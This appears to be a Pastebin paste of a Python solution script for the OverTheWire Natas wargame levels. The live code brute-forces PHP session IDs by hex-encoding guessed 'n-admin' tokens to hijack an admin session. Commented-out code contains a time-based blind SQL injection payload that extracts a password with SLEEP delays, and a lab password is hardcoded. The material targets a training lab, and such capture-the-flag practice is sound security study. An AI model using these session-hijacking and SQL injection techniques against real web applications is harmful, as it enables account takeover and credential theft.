Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- import requests, string, time, binascii
- session = requests.Session()
- username = 'natas20'
- password = 'eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF'
- url = 'http://{}.natas.labs.overthewire.org/index.php?debug=true'.format(username)
- i = 337
- s = str(337)+'-'
- #cookie = {
- # 'name':'PHPSESSID',
- # 'value': str(binascii.b2a_hex(b'337-'))
- #}
- #print(str(binascii.b2a_hex(b'337-')))
- #res = session.post(url, data={"username": "", "password": "blabla"}, auth=(username, password))
- #print(res.text)
- for i in range(641):
- token = str(binascii.b2a_hex(str('%d-admin' % i).encode())).strip("b'")
- print('Trying with token {}'.format(token))
- res = session.post(url, cookies={'PHPSESSID': token}, data={"username": "admin", "password": "blabla"}, auth=(username, password))
- if 'regular' not in res.text:
- print(res.text)
- # res = requests.get(url, auth=(username, password))
- #curr_pw = ''
- #while(True):
- # start = time.time()
- # res = requests.post(url, data={"username": "natas18\" AND password LIKE BINARY \"%\" AND SLEEP(0.2);#"}, auth=(username, password))
- # print('{:.2f}s'.format(time.time()-start))
- #while len(curr_pw) < len(password):
- # for char in string.ascii_letters + string.digits:
- # tmp_pw = curr_pw + char
- # start = time.time()
- # res = requests.post(url, data={"username": "natas18\" AND password LIKE BINARY \"{}%\" AND SLEEP(8);#".format(tmp_pw)}, auth=(username, password))
- # if (time.time()-start) >= 8:
- # curr_pw = tmp_pw
- # break
- # print(curr_pw)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
